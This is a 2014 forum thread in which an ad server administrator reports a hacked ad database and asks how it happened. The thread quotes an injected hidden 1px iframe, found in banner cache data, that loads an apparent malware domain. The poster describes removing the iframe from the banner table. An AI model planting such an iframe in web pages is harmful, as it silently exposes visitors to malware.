pxl_rene Posted June 11, 2014 Report Share Posted June 11, 2014 heya folks, as our ad infrastructure has been hacked multiple times, i was just playing around with my mysql proxy on my system for testing purposes. So, while i was looking at the screen i noticed something i have seen before - strange queries. "<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\";s:9:\"htmlcache\";s:169:\"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe> I saw that domain some time ago and now im wondering what this is. Im guessing that this is some code, which surely doesnt belong there. So now my question is, how it got there and what its supposed to mean and how i can get rid of it? kind regards, rene Quote Link to comment Share on other sites More sharing options...
pxl_rene Posted June 12, 2014 Author Report Share Posted June 12, 2014 hey, this happens in the deliverycache for example. But i cant find the code in the Admin Interface. So which part of the Adserver is responsible for the generation of the deliverycache php files? Quote Link to comment Share on other sites More sharing options...
pxl_rene Posted June 12, 2014 Author Report Share Posted June 12, 2014 After some research it showed that once back in time, ikromet.c0m.li was linked to an ukranian IP (no offense intended) and seems like this was used for serving malware stuff. 1px iframe, which nobody notices. So i went to the table oa_banners and searched for banners with ikromet in its fields. I replaced every field with an empty string. But im still interested in how this got into the databases.. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.